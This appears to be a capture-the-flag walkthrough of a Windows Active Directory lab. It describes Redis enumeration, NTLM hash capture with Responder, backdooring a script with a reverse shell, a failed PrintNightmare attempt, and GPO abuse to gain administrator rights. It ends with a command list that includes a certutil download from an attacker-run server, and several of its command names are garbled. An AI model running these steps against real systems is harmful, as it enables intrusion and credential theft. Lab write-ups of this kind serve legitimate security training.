In this walk-through, we covered enumerating a Redis No SQL database and exploiting print spooler service CVE-2021-34527 or what’s called the PrintNightMare and group policy in Active Directory.
VulnNet Entertainment had a bad time with their previous network which suffered multiple breaches. Now they moved their entire infrastructure and hired you again as a core penetration tester. Your objective is to get full access to the system and compromise the domain.
- Difficulty: Medium
- Operating System: Windows
Another Windows machine. Do your best and breach it, good luck!
Initial Scans and User Flag
I started with an Nmap scan, which showed a Redis database running. After installing the redis-cli
tool, I connected to the database and used the info
command to confirm it was running on Windows.
To get the user flag, I used the eval
command in Redis to try and display a sensitive file. This actually caused an error that conveniently spat out the user flag for me.
Getting a Foothold
Next, I used the config get star
command to find exposed directories and the username “enterprise security”. To get this user’s NTLM hash, I set up a Responder listener on my machine and used a Redis command to make the target machine connect back to me.
With the captured hash, I used Hashcat to crack it and get the password. I then used the SMB client to connect to the server and found a PowerShell script. I downloaded the script, added a reverse shell payload to it, and re-uploaded it. After setting up a Netcat listener, the executed script gave me a shell as the “enterprise security” user.
Privilege Escalation Attempts
My first thought for privilege escalation was to try the PrintNightmare vulnerability, since the Nmap scan showed the Windows Print Spooler service was running. I used rpcmap.py
to check for the vulnerability and even created a malicious DLL with msfvenom
. However, when I tried to run the exploit, it failed.
So, I switched gears and decided to use BloodHound. I transferred the SharpHound.exe
collector to the target machine, ran it to collect Active Directory data, and then analyzed the data back on my machine.
BloodHound showed me that the “enterprise security” user had “GenericWrite” access to a Group Policy Object (GPO). I used SharpGPOAbuse.exe
to exploit this by adding a scheduled task to the GPO that would add the “enterprise security” user to the local “Administrators” group. I forced the policy update with gpupdate /force
, and just like that, I had admin rights!
Getting the System Flag 🚩
With my new admin privileges, I used the SMB client to access the C$ share on the target machine. From there, it was just a matter of navigating to the administrator’s desktop and grabbing the system flag.
Technical Commands Used
Here are the technical commands I used in the terminal during the demonstration:
sudo apt get install redis cli
redust cli -h [IP]
eval
config get star
sudo responder -I [interface]
hash cat
smb client -L [IP] -U [user]
invoke-expression
python3 rpc map
msf venom
use multi/handler
sudo python3 -m http.server 80
certutil.exe -urlcache -f http://[IP]/[file] [file]
sharphound.exe
copy [source] \\[IP]\[share]
sharp gpu appeals
gpu update /force
get system.txt
What is the system flag? (Desktop\system.txt)